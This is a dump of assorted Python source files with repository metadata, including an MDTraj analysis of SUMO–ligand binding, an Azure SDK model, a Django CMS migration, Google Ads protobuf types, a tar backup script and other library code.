options = dict(host='127.0.0.1', port=6000)
client_pool = gsocketpool.pool.Pool(RPCPoolClient, options)
def _call(n):
with client_pool.connection() as client:
return client.call('sum', 1, 2)
glet_pool = gevent.pool.Pool(10)
print [result for result in glet_pool.imap_unordered(_call, xrange(10))]
call()
call_using_pool()
|
[
"[email protected]"
] | |
530d9a1a9c81e48861a573078a5fcca53d28e741
|
e4ec5b6cf3cfe2568ef0b5654c019e398b4ecc67
|
/azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/network/v2017_06_01/models/network_interface_association.py
|
56f1d3b0eda3f4acd5b0007f57df14bfd8f42f49
|
[] |
no_license
|
EnjoyLifeFund/macHighSierra-cellars
|
59051e496ed0e68d14e0d5d91367a2c92c95e1fb
|
49a477d42f081e52f4c5bdd39535156a2df52d09
|
refs/heads/master
| 2022-12-25T19:28:29.992466 | 2017-10-10T13:00:08 | 2017-10-10T13:00:08 | 96,081,471 | 3 | 1 | null | 2022-12-17T02:26:21 | 2017-07-03T07:17:34 | null |
UTF-8
|
Python
| false | false | 1,281 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class NetworkInterfaceAssociation(Model):
"""Network interface and its custom security rules.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Network interface ID.
:vartype id: str
:param security_rules: Collection of custom security rules.
:type security_rules: list of :class:`SecurityRule
<azure.mgmt.network.v2017_06_01.models.SecurityRule>`
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'security_rules': {'key': 'securityRules', 'type': '[SecurityRule]'},
}
def __init__(self, security_rules=None):
self.id = None
self.security_rules = security_rules
|
[
"[email protected]"
] | |
40704cee49a3949e9dcf543e0695bacb829c017f
|
e885c02621101ea646c9dcc3e934dd7ceaaf4f04
|
/djangocms_disqus/migrations/0001_initial.py
|
7be273f44c0b09ed5f6447a8d57db12cadbb0691
|
[
"BSD-3-Clause"
] |
permissive
|
mishbahr/djangocms-disqus
|
40421d6662ef911542287fc0c2e8b81a63e49667
|
49e75a024e2ca1c932a8b9134500c2f24137a153
|
refs/heads/master
| 2023-01-05T00:46:39.514178 | 2017-05-23T22:15:12 | 2017-05-23T22:15:12 | 42,411,019 | 21 | 5 |
BSD-3-Clause
| 2022-12-26T19:52:38 | 2015-09-13T20:07:18 |
Python
|
UTF-8
|
Python
| false | false | 1,804 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from connected_accounts.fields import AccountField
from ..conf import settings
class Migration(migrations.Migration):
dependencies = [
('connected_accounts', '__latest__'),
('cms', '__latest__'),
]
operations = [
migrations.CreateModel(
name='Disqus',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('shortname', models.CharField(help_text='Select a website Or register a new one on the Disqus website. https://disqus.com/admin/signup/', max_length=150, verbose_name='Shortname')),
('enable_sso', models.BooleanField(default=False, help_text='Allows users to log in to Disqus via your site.', verbose_name='Enable Single Sign-On')),
('load_event', models.CharField(default=settings.DJANGOCMS_DISQUS_LOADING_CHOICES[0][0], max_length=100, verbose_name='Load Disqus', choices=settings.DJANGOCMS_DISQUS_LOADING_CHOICES)),
('site_name', models.CharField(help_text='Used for the SSO login button.', max_length=100, verbose_name='Site Name', blank=True)),
('button_text', models.CharField(help_text='By default it will be "Load Comments..."', max_length=100, verbose_name='Button Text', blank=True)),
('account', AccountField(verbose_name='Connected Account', to='connected_accounts.Account', provider='disqus', help_text='Select a connected Disqus account or connect to a new account.')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
]
|
[
"[email protected]"
] | |
3a79fc6c3eb34308f2013497b29f90ad59a89e7b
|
fc85a54686e13e598541df14c472e8aa744e6713
|
/petisco/extra/sqlalchemy/sql/mysql/mysql_connection.py
|
ccf69974f1b0fbfe9c880d72c61912564fc1f72c
|
[
"MIT"
] |
permissive
|
alice-biometrics/petisco
|
63721751cd43e70825b161a5ece535c80d95b6fa
|
771ebe5c69dc735b8f373c2e7303d3b4eb655044
|
refs/heads/main
| 2023-09-01T03:53:23.642042 | 2023-08-25T05:38:42 | 2023-08-25T05:38:42 | 217,555,512 | 42 | 2 |
MIT
| 2023-09-12T11:06:43 | 2019-10-25T14:48:10 |
Python
|
UTF-8
|
Python
| false | false | 1,700 |
py
|
import os
MYSQL_DATABASE_DEFAULT = "mysql_test"
class MySqlConnection:
def __init__(
self,
server_name: str,
driver: str,
user: str,
password: str,
host: str,
port: str,
database_name: str,
url: str,
):
self.server_name = server_name
self.driver = driver
self.user = user
self.password = password
self.host = host
self.port = port
self.database_name = database_name
self.url = url
@staticmethod
def create(
server_name: str = "mysql",
driver: str = "pymysql",
user: str = "root",
password: str = "root",
host: str = "mysql",
port: str = "3306",
database_name: str = MYSQL_DATABASE_DEFAULT,
) -> "MySqlConnection":
url = (
f"{server_name}+{driver}://{user}:{password}@{host}:{port}/{database_name}"
)
return MySqlConnection(
server_name, driver, user, password, host, port, database_name, url
)
@staticmethod
def create_local(database_name: str = MYSQL_DATABASE_DEFAULT) -> "MySqlConnection":
return MySqlConnection.create(
host="localhost", port="3307", database_name=database_name
)
@staticmethod
def from_environ() -> "MySqlConnection":
return MySqlConnection.create(
"mysql",
"pymysql",
os.getenv("MYSQL_USER", "root"),
os.getenv("MYSQL_PASSWORD", "root"),
os.getenv("MYSQL_HOST", "mysql"),
os.getenv("MYSQL_PORT", "3306"),
os.getenv("MYSQL_DATABASE", MYSQL_DATABASE_DEFAULT),
)
|
[
"[email protected]"
] | |
5e92281f35cff75f5d8fd68958f6faad390bb658
|
1711a28e01e40c0164be23536ff109c428f3dd8c
|
/SUMO_compound_mdtraj_analysis.py
|
6d5a65145a08e70043aae6c8b2f867f060261593
|
[] |
no_license
|
sunhuaiyu/mdtraj
|
adafd4b4408b688f23fed659e8fbaefd4ff1bd42
|
d626841025e9f9411e988cee6631edcbf171499d
|
refs/heads/master
| 2020-05-07T20:28:33.381621 | 2019-05-02T00:00:02 | 2019-05-02T00:00:02 | 180,862,388 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,277 |
py
|
import numpy as np
import matplotlib.pyplot as plt
import mdtraj as md
from glob import glob
from multiprocessing import Pool
def SUMO_ligand_dist(tr):
#coordinates for the Cgamma of SUMO1_F36, SUMO2_F31, or SUMO3_F31:
select_str = '(resname==PHE and (resid==15 or resid==30 or resid==17)) and (name==CG)'
atom_ix = tr.topology.select(select_str)[0]
a = tr.xyz[:, atom_ix]
# ligand all atom coordinatess:
lig = tr.atom_slice(tr.topology.select('chainid==1'))
# ligand center of mass:
b = md.compute_center_of_mass(lig)
# distance between K37/K32_CA and ligand center of mass:
return (((a - b) ** 2).sum(1)) ** 0.5
# read trajectory file in HDF5 format (*.h5), compute SUMO_ligand_dist
def name2traj(file_name):
tr = md.load(file_name)
if tr.n_frames > 10000:
tr = tr[::10]
return tr
# given trajectory file name in HDF5 format, plot SUMO_ligand_dist
def plot_dist(traj_name):
plt.plot(SUMO_ligand_dist(name2traj(traj_name)), linewidth=1)
plt.ylim(0, 4.5)
title = traj_name.split('.')[0]
plt.title(title)
plt.savefig(title + '.jpg', dpi=600)
plt.close()
# calculate fraction of frames where the distance is less than a cut-off
compound = ['PHG00686', 'SEW05414', 'HTS12268', 'BTB13496']
compound2traj_name = {i: glob('SUMO1_2uyz_{}_F*_5000ns.h5'.format(i)) for i in compound}
traj_files = sum(list(compound2traj_name.values()))
# traj_dict contains all loaded trajectories
# dist_dict contains all calculated distances;
# accelerate calculation with multiprocessing
def D(file_name):
tr = name2traj(file_name)
d = SUMO_ligand_dist(tr)
return [tr, d]
DD = Pool(48).map(D, traj_files)
traj_dict = {i[0]:i[1][0] for i in zip(traj_files, DD)}
dist_dict = {i[0]:i[1][1] for i in zip(traj_files, DD)}
# distance (nm) threshold
T = 0.7
# calculate the fraction of trajectories with compound at SIM-binding site
for cp in compound:
all_dist = np.array([dist_dict[i] for i in compound2traj_name[cp]]).ravel()
bound_frames, total_frames = sum(all_dist < T), len(all_dist)
fraction = bound_frames/total_frames
print(cp, round(fraction, 3), total_frames//1000)
# plotting: stack all distance plot together for each compound
for cp in compound:
n = len(compound2traj_name[cp])
fig, axs = plt.subplots(nrows=n, ncols=1, sharex=True)
fig.set_figheight(n)
fig.set_figwidth(4)
axs[0].set_title(cp)
for i in np.arange(n):
dc = dist_dict['SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)]
bound = dc < T
unbound = np.invert(bound)
length = dc.shape[0]
axs[i].plot(np.arange(length)[unbound], dc[unbound],
'C1.', markersize=0.5, alpha=0.6)
axs[i].plot(np.arange(length)[bound], dc[bound],
'C0.', markersize=0.5, alpha=0.6)
axs[i].set_ylim(0, 4.5)
fig.subplots_adjust(hspace=0)
fig.savefig('SUMO1_2uyz_{}_dist_all_traj.jpg'.format(cp),
dpi=600, bbox_inches='tight')
# extract a centroid frame from each traj ending with significant binding;
# for each compound, superpose all centroids along the SIM-binding pocket
# and save as one pdb file
centroids = {cp:[] for cp in compound}
for cp in compound:
n = len(compound2traj_name[cp])
for i in np.arange(n):
file_name = 'SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)
dc = dist_dict[file_name]
bound = dc < T
if sum(bound) > 1000:
tr = traj_dict[file_name][bound]
protein_atoms = tr.topology.select('residue 32 to 56')
compound_atoms = tr.topology.select('chainid==1')
atoms_ix = np.concatenate((protein_atoms, compound_atoms))
tr.superpose(tr, frame=0, atom_indices=atoms_ix)
m = np.empty((tr.n_frames, tr.n_frames)) # rmsd matrix
for i in range(tr.n_frames):
m[i] = md.rmsd(tr, tr, i, atom_indices=atoms_ix)
#compute the centroid frame: the one closest to mean frame
centroid_ix = np.exp(-m/m.std()).sum(1).argmax()
centroids[cp].append(tr[centroid_ix])
print(file_name)
centroids_tr = md.join(centroids[cp])
centroids_tr.superpose(centroids_tr, frame=0, atom_indices=protein_atoms)
centroids_tr.save_pdb('SUMO1_2uyz_{}_bound_centroids.pdb'.format(cp))
# compute RMSD among bound_centroids
from scipy.spatial.distance import squareform
for cp in compound:
tr = md.load('SUMO1_2uyz_{}_bound_centroids.pdb'.format(cp))
m = array([md.rmsd(tr, tr, i, atom_indices=protein_atoms) for i in range(len(tr))])
m = squareform(m, checks=False)
print(cp, min(m), max(m))
# compute atomic distances
T = 0.7
tr2uyz = md.join([md.load('SUMO1_2uyz_{}_400ns.h5'.format(i+1)) for i in range(12)])
cp = 'PHG00686'
d = [dist_dict['SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)] for i in range(12)]
tr1cp = md.join([traj_dict['SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)][d[i] < T] for i in range(12)])
def atom_pair_dist3(cp, pair='F36CG_R54CZ'):
top = tr2uyz[0].topology
s = pair.split('_')
pair_ix = top.select_pairs('residue=={0} and name=={1}'.format(s[0][1:3], s[0][3:]),
'residue=={0} and name=={1}'.format(s[1][1:3], s[1][3:]))
dist2uyz = md.compute_distances(tr2uyz, atom_pairs=pair_ix, periodic=False)
dist1cp = md.compute_distances(tr1cp, atom_pairs=pair_ix, periodic=False)
fig = plt.figure(figsize=(10, 4.8))
gs = GridSpec(1, 2, width_ratios=[2, 1])
ax0, ax1 = plt.subplot(gs[0]), plt.subplot(gs[1])
ax0.plot(dist2uyz, 'C1.', markersize=1)
ax0.plot(dist1cp, 'C0.', markersize=1, alpha=0.5)
ax0.tick_params(labelsize=15)
ax1.hist(dist2uyz, color='C1', bins=100, linewidth=1,
orientation='horizontal')
ax1.hist(dist1cp, color='C0', alpha=0.6, bins=100, linewidth=1,
orientation='horizontal')
ax1.tick_params(labelsize=15)
ax1.legend(['no compound', 'with {}'.format(cp)], fontsize=15, frameon=0)
fig.tight_layout()
fig.savefig('SUMO1_2uyz_{0}_dist_{1}.jpg'.format(cp, pair), dpi=600)
|
[
"[email protected]"
] | |
47b910274ca6546bd96488e2c3027896b833a188
|
7abd8bbbba8f401c4ce9d9ec550a0cae4a6f19ed
|
/bingads/v12/bulk/entities/__init__.py
|
afc5d3d8bf175347a50c466420cd874f00447f89
|
[
"MIT"
] |
permissive
|
stevenblanton/BingAds-Python-SDK
|
fd2f119db51e1a91962aa5ee4bb86344e58078a8
|
5b6e6499ae1dcc6fb8ba3032ad1a2b6ee63705c9
|
refs/heads/master
| 2020-09-05T12:11:04.168580 | 2019-11-01T15:49:08 | 2019-11-01T15:49:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 909 |
py
|
__author__ = 'Bing Ads SDK Team'
__email__ = '[email protected]'
from .common import *
from .bulk_error import *
from .bulk_entity import *
from .bid_suggestion_data import *
from .unknown_bulk_entity import *
from .bulk_account import *
from .bulk_budget import *
from .bulk_campaign import *
from .bulk_ad_group import *
from .bulk_keyword import *
from .bulk_campaign_product_scope import *
from .bulk_ad_group_product_partition import *
from .bulk_campaign_negative_dynamic_search_ad_target import *
from .bulk_ad_group_dynamic_search_ad_target import *
from .bulk_ad_group_negative_dynamic_search_ad_target import *
from .ad_extensions import *
from .bulk_ads import *
from .bulk_negative_keywords import *
from .bulk_negative_sites import *
from .audiences import *
from .target_criterions import *
from .labels import *
from .bulk_offline_conversion import *
from .bulk_experiment import *
|
[
"[email protected]"
] | |
61a49f9ce140730c3fb6b664ca5ac5bc8085cfb0
|
6fa701cdaa0d83caa0d3cbffe39b40e54bf3d386
|
/google/ads/googleads/v6/googleads-py/google/ads/googleads/v6/services/types/media_file_service.py
|
d18d6a8d09b03c92f8310398e3c6a6a1be1ac137
|
[
"Apache-2.0"
] |
permissive
|
oltoco/googleapis-gen
|
bf40cfad61b4217aca07068bd4922a86e3bbd2d5
|
00ca50bdde80906d6f62314ef4f7630b8cdb6e15
|
refs/heads/master
| 2023-07-17T22:11:47.848185 | 2021-08-29T20:39:47 | 2021-08-29T20:39:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,355 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v6.enums.types import response_content_type as gage_response_content_type
from google.ads.googleads.v6.resources.types import media_file as gagr_media_file
from google.rpc import status_pb2 # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v6.services',
marshal='google.ads.googleads.v6',
manifest={
'GetMediaFileRequest',
'MutateMediaFilesRequest',
'MediaFileOperation',
'MutateMediaFilesResponse',
'MutateMediaFileResult',
},
)
class GetMediaFileRequest(proto.Message):
r"""Request message for
[MediaFileService.GetMediaFile][google.ads.googleads.v6.services.MediaFileService.GetMediaFile]
Attributes:
resource_name (str):
Required. The resource name of the media file
to fetch.
"""
resource_name = proto.Field(
proto.STRING,
number=1,
)
class MutateMediaFilesRequest(proto.Message):
r"""Request message for
[MediaFileService.MutateMediaFiles][google.ads.googleads.v6.services.MediaFileService.MutateMediaFiles]
Attributes:
customer_id (str):
Required. The ID of the customer whose media
files are being modified.
operations (Sequence[google.ads.googleads.v6.services.types.MediaFileOperation]):
Required. The list of operations to perform
on individual media file.
partial_failure (bool):
If true, successful operations will be
carried out and invalid operations will return
errors. If false, all operations will be carried
out in one transaction if and only if they are
all valid. Default is false.
validate_only (bool):
If true, the request is validated but not
executed. Only errors are returned, not results.
response_content_type (google.ads.googleads.v6.enums.types.ResponseContentTypeEnum.ResponseContentType):
The response content type setting. Determines
whether the mutable resource or just the
resource name should be returned post mutation.
"""
customer_id = proto.Field(
proto.STRING,
number=1,
)
operations = proto.RepeatedField(
proto.MESSAGE,
number=2,
message='MediaFileOperation',
)
partial_failure = proto.Field(
proto.BOOL,
number=3,
)
validate_only = proto.Field(
proto.BOOL,
number=4,
)
response_content_type = proto.Field(
proto.ENUM,
number=5,
enum=gage_response_content_type.ResponseContentTypeEnum.ResponseContentType,
)
class MediaFileOperation(proto.Message):
r"""A single operation to create media file.
Attributes:
create (google.ads.googleads.v6.resources.types.MediaFile):
Create operation: No resource name is
expected for the new media file.
"""
create = proto.Field(
proto.MESSAGE,
number=1,
oneof='operation',
message=gagr_media_file.MediaFile,
)
class MutateMediaFilesResponse(proto.Message):
r"""Response message for a media file mutate.
Attributes:
partial_failure_error (google.rpc.status_pb2.Status):
Errors that pertain to operation failures in the partial
failure mode. Returned only when partial_failure = true and
all errors occur inside the operations. If any errors occur
outside the operations (e.g. auth errors), we return an RPC
level error.
results (Sequence[google.ads.googleads.v6.services.types.MutateMediaFileResult]):
All results for the mutate.
"""
partial_failure_error = proto.Field(
proto.MESSAGE,
number=3,
message=status_pb2.Status,
)
results = proto.RepeatedField(
proto.MESSAGE,
number=2,
message='MutateMediaFileResult',
)
class MutateMediaFileResult(proto.Message):
r"""The result for the media file mutate.
Attributes:
resource_name (str):
The resource name returned for successful
operations.
media_file (google.ads.googleads.v6.resources.types.MediaFile):
The mutated media file with only mutable fields after
mutate. The field will only be returned when
response_content_type is set to "MUTABLE_RESOURCE".
"""
resource_name = proto.Field(
proto.STRING,
number=1,
)
media_file = proto.Field(
proto.MESSAGE,
number=2,
message=gagr_media_file.MediaFile,
)
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"bazel-bot-development[bot]@users.noreply.github.com"
] |
bazel-bot-development[bot]@users.noreply.github.com
|
d827d71d9c05c7c9a359841ae13e780b7c1620e1
|
0e0bd9d0082bf71918db9f6c92c2cefd32fd23bd
|
/guild/commands/runs_import.py
|
354c23dc47578e9820036cf0779f49107bcd69fb
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
christabella/guildai
|
b911d9758296503c431b571dc4696a3690f44b3d
|
10d34eb9aa02aa4a374c340e75b5d44d9f3d8a25
|
refs/heads/master
| 2022-12-17T18:34:45.766299 | 2020-08-31T12:42:25 | 2020-08-31T12:42:25 | 294,189,964 | 0 | 0 |
Apache-2.0
| 2020-09-09T18:02:13 | 2020-09-09T18:02:12 | null |
UTF-8
|
Python
| false | false | 2,500 |
py
|
# Copyright 2017-2020 TensorHub, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
import click
from guild import click_util
from . import runs_support
def _ac_archive(**_kw):
return click_util.completion_dir()
def import_params(fn):
click_util.append_params(
fn,
[
runs_support.runs_arg,
click.Argument(("archive",)),
click.Option(
("-m", "--move"),
help="Move imported runs rather than copy.",
is_flag=True,
),
click.Option(
("--copy-resources",),
help="Copy resources for each imported run.",
is_flag=True,
),
runs_support.all_filters,
click.Option(
("-y", "--yes"), help="Do not prompt before importing.", is_flag=True
),
],
)
assert fn.__click_params__[-1].name == "runs", fn.__click_params__
fn.__click_params__[-1].autocompletion = _ac_archive
return fn
@click.command("import")
@import_params
@click.pass_context
@click_util.use_args
@click_util.render_doc
def import_runs(ctx, args):
"""Import one or more runs from `ARCHIVE`.
`ARCHIVE` must be a directory that contains exported runs. Archive
directories can be created using ``guild export``.
You may use ``guild runs list --archive ARCHIVE`` to view runs in
`ARCHIVE`.
By default, resources are NOT copied with each imported run, but
their links are maintained. To copy resources, use
`--copy-resources`.
**WARNING**: Use `--copy-resources` with care as each imported run
will contain a separate copy of each resource!
{{ runs_support.runs_arg }}
If a `RUN` argument is not specified, ``:`` is assumed (all runs
are selected).
{{ runs_support.all_filters }}
"""
from . import runs_impl
runs_impl.import_(args, ctx)
|
[
"[email protected]"
] | |
af0407d686f5be807f2d3d4b938ec56483a3f89e
|
d6b0bc433b260b5d519d73087d5df46aa516fcdd
|
/biobb_adapters/pycompss/biobb_amber/pmemd/pmemd_mdrun.py
|
e94945a6809b7c30cc12c1d92b7e2ea6151423f4
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
bioexcel/biobb_adapters
|
b5442fe953b90be4e66faf3460b4a88a40e6d448
|
3daa84ba83a7951add017dd0f05dc361aa99dfe5
|
refs/heads/master
| 2023-08-14T08:46:39.323257 | 2023-08-02T09:05:21 | 2023-08-02T09:05:21 | 157,351,268 | 0 | 2 |
Apache-2.0
| 2023-04-01T14:56:43 | 2018-11-13T09:07:36 |
Common Workflow Language
|
UTF-8
|
Python
| false | false | 3,420 |
py
|
# Python
import os
import sys
import traceback
# Pycompss
from pycompss.api.task import task
from pycompss.api.parameter import FILE_IN, FILE_OUT
from pycompss.api.multinode import multinode
from pycompss.api.constraint import constraint
# Adapters commons pycompss
from biobb_adapters.pycompss.biobb_commons import task_config
# Wrapped Biobb
from biobb_amber.pmemd.pmemd_mdrun import PmemdMDRun # Importing class instead of module to avoid name collision
task_time_out = int(os.environ.get('TASK_TIME_OUT', 0))
computing_nodes = str(os.environ.get('TASK_COMPUTING_NODES', "1"))
computing_units = str(os.environ.get('TASK_COMPUTING_UNITS', "1"))
gpu_units = str(os.environ.get('TASK_GPU_UNITS', "0"))
@constraint(processors=[{'processorType':'CPU', 'computingUnits':computing_units}, {'processorType':'GPU', 'computingUnits':gpu_units}])
@multinode(computing_nodes=computing_nodes)
@task(input_top_path=FILE_IN, input_crd_path=FILE_IN, output_log_path=FILE_OUT, output_traj_path=FILE_OUT, output_rst_path=FILE_OUT, input_mdin_path=FILE_IN, input_cpin_path=FILE_IN, input_ref_path=FILE_IN, output_cpout_path=FILE_OUT, output_cprst_path=FILE_OUT, output_mdinfo_path=FILE_OUT,
on_failure="IGNORE", time_out=task_time_out)
def _pmemdmdrun(input_top_path, input_crd_path, output_log_path, output_traj_path, output_rst_path, input_mdin_path, input_cpin_path, input_ref_path, output_cpout_path, output_cprst_path, output_mdinfo_path, properties, **kwargs):
task_config.config_multinode(properties)
try:
PmemdMDRun(input_top_path=input_top_path, input_crd_path=input_crd_path, output_log_path=output_log_path, output_traj_path=output_traj_path, output_rst_path=output_rst_path, input_mdin_path=input_mdin_path, input_cpin_path=input_cpin_path, input_ref_path=input_ref_path, output_cpout_path=output_cpout_path, output_cprst_path=output_cprst_path, output_mdinfo_path=output_mdinfo_path, properties=properties, **kwargs).launch()
except Exception as e:
traceback.print_exc()
raise e
finally:
sys.stdout.flush()
sys.stderr.flush()
def pmemd_mdrun(input_top_path, input_crd_path, output_log_path, output_traj_path, output_rst_path, input_mdin_path=None, input_cpin_path=None, input_ref_path=None, output_cpout_path=None, output_cprst_path=None, output_mdinfo_path=None, properties=None, **kwargs):
if (output_log_path is None or (os.path.exists(output_log_path) and os.stat(output_log_path).st_size > 0)) and \
(output_traj_path is None or (os.path.exists(output_traj_path) and os.stat(output_traj_path).st_size > 0)) and \
(output_rst_path is None or (os.path.exists(output_rst_path) and os.stat(output_rst_path).st_size > 0)) and \
(output_cpout_path is None or (os.path.exists(output_cpout_path) and os.stat(output_cpout_path).st_size > 0)) and \
(output_cprst_path is None or (os.path.exists(output_cprst_path) and os.stat(output_cprst_path).st_size > 0)) and \
(output_mdinfo_path is None or (os.path.exists(output_mdinfo_path) and os.stat(output_mdinfo_path).st_size > 0)) and \
True:
print("WARN: Task PmemdMDRun already executed.")
else:
_pmemdmdrun( input_top_path, input_crd_path, output_log_path, output_traj_path, output_rst_path, input_mdin_path, input_cpin_path, input_ref_path, output_cpout_path, output_cprst_path, output_mdinfo_path, properties, **kwargs)
|
[
"[email protected]"
] | |
7be70ac3312c262cb16fc7fdd8dcb45124a48f14
|
d2b2023261ccdcaf560a2e7b0bab13ecdedacfc9
|
/03/fullbackup.py
|
00cb6631683557864d36d5b2b9b06ca824c29799
|
[] |
no_license
|
lilyef2000/lesson
|
a9d96ffc19f68fa3f044f240de6496b6d69394f6
|
2a5abb00b9bbb8bb36602ea6e1e8c464accc0759
|
refs/heads/master
| 2021-01-10T08:41:14.524421 | 2016-01-01T18:04:04 | 2016-01-01T18:04:04 | 46,460,003 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 879 |
py
|
#!/usr/bin/python
import sys,os,time,logger
source_file = sys.argv[1]
formated_source_file = source_file.split('/')[-1]
backup_dir = '/home/Administrator/lesson/backup/'
backup_to_file = '''%s%s_%s.tgz'''% (backup_dir,formated_source_file,time.strftime("%Y%m%d%H%M%S",time.localtime()))
def run_backup(runtime='now',exclude_file_name='None'):
if len(sys.argv) == 4:
print '--------exclude file mode--------'
if sys.argv[2] == '-X':
exclude_file_name = sys.argv[3]
backup_cmd = "tar -cvzfX %s %s %s " %(backup_to_file,exclude_file_name,source_file)
else:
print '--------Normal mode:--------'
backup_cmd = "tar -cvzf %s %s |wc -l" %(backup_to_file,source_file)
run_command = os.system(backup_cmd)
if run_command == 0:
logger.record_log('Full Backup','Success','N/A','test')
else:
logger.record_log('Full Backup','Failure','N/A','test')
run_backup()
|
[
"[email protected]"
] | |
c82afac573bf870007f2a26a2677f45d8e51d99c
|
04ae1836b9bc9d73d244f91b8f7fbf1bbc58ff29
|
/1233/solution.py
|
c47461e1a3ab14eb3051ffb577ac9f8ff8d4de5e
|
[] |
no_license
|
zhangruochi/leetcode
|
6f739fde222c298bae1c68236d980bd29c33b1c6
|
cefa2f08667de4d2973274de3ff29a31a7d25eda
|
refs/heads/master
| 2022-07-16T23:40:20.458105 | 2022-06-02T18:25:35 | 2022-06-02T18:25:35 | 78,989,941 | 14 | 6 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,365 |
py
|
class Node():
def __init__(self, str_):
self.str_ = str_
def __eq__(self, other):
return self.str_ == other.str_
def __repr__(self):
return self.str_
def __repr__(self):
return self.str_
def __hash__(self):
return hash(self.str_)
def __call__(self,str_):
return Node(str_)
class Solution:
def removeSubfolders(self, folder: List[str]) -> List[str]:
trie = {}
res = []
def transfrom(f):
return list(map(Node, f.strip("/").split("/")))
folder = list( map(transfrom, folder))
print(folder)
for f in folder:
trie_pointer = trie
for char in f:
trie_pointer = trie_pointer.setdefault(char, {})
trie_pointer["#"] = "#"
def combine(path):
return "/"+"/".join([str(node) for node in path])
def dfs(trie, path):
nonlocal res
if "#" in trie:
res.append(combine(path))
return
for char in trie:
path.append(char)
dfs(trie[char],path)
path.pop()
dfs(trie, [])
return res
|
[
"[email protected]"
] | |
3259d0615171353e16e44fb0506a5558587028c0
|
d037002f9d2b383ef84686bbb9843dac8ee4bed7
|
/tutorials/Trash/Distributed-DRL/torch/sac_test/utils/environment.py
|
c86069ea34cea9e7eb5b64d4846270b3babd3d96
|
[
"MIT"
] |
permissive
|
ICSL-hanyang/Code_With_RL
|
4edb23ca24c246bb8ec75fcf445d3c68d6c40b6d
|
1378996e6bf6da0a96e9c59f1163a635c20b3c06
|
refs/heads/main
| 2023-08-15T18:37:57.689950 | 2021-10-18T07:31:59 | 2021-10-18T07:31:59 | 392,944,467 | 0 | 0 | null | 2021-08-05T07:20:57 | 2021-08-05T07:20:56 | null |
UTF-8
|
Python
| false | false | 971 |
py
|
import gym
class Environment:
def __init__(self,env_name):
self.env = gym.make(env_name)
self.state_dim = self.env.observation_space.shape[0]
self._max_episode_steps = self.env._max_episode_steps
self.can_run = False
self.state = None
if type(self.env.action_space) == gym.spaces.box.Box : #Continuous
self.action_dim = self.env.action_space.shape[0]
self.is_discrete = False
else :
self.action_dim = self.env.action_space.n
self.is_discrete = True
def reset(self):
assert not self.can_run
self.can_run = True
self.state = self.env.reset()
return self.state
def step(self,action):
assert self.can_run
next_state, reward, done, info = self.env.step(action)
self.state = next_state
if done == True:
self.can_run = False
return next_state, reward, done, info
|
[
"[email protected]"
] | |
e5679a098872822f28be752dec6bb6519196d5b7
|
8a5ab3d33e3b653c4c64305d81a85f6a4582d7ac
|
/PySide/QtCore/QTimer.py
|
5e91243992b9f324a3a089a65f93db3242e8a538
|
[
"Apache-2.0"
] |
permissive
|
sonictk/python-skeletons
|
be09526bf490856bb644fed6bf4e801194089f0d
|
49bc3fa51aacbc2c7f0c7ab86dfb61eefe02781d
|
refs/heads/master
| 2020-04-06T04:38:01.918589 | 2016-06-09T20:37:43 | 2016-06-09T20:37:43 | 56,334,503 | 0 | 0 | null | 2016-04-15T16:30:42 | 2016-04-15T16:30:42 | null |
UTF-8
|
Python
| false | false | 1,511 |
py
|
# encoding: utf-8
# module PySide.QtCore
# from /corp.blizzard.net/BFD/Deploy/Packages/Published/ThirdParty/Qt4.8.4/2015-05-15.163857/prebuilt/linux_x64_gcc41_python2.7_ucs4/PySide/QtCore.so
# by generator 1.138
# no doc
# no imports
from QObject import QObject
class QTimer(QObject):
# no doc
def interval(self, *args, **kwargs): # real signature unknown
pass
def isActive(self, *args, **kwargs): # real signature unknown
pass
def isSingleShot(self, *args, **kwargs): # real signature unknown
pass
def killTimer(self, *args, **kwargs): # real signature unknown
pass
def setInterval(self, *args, **kwargs): # real signature unknown
pass
def setSingleShot(self, *args, **kwargs): # real signature unknown
pass
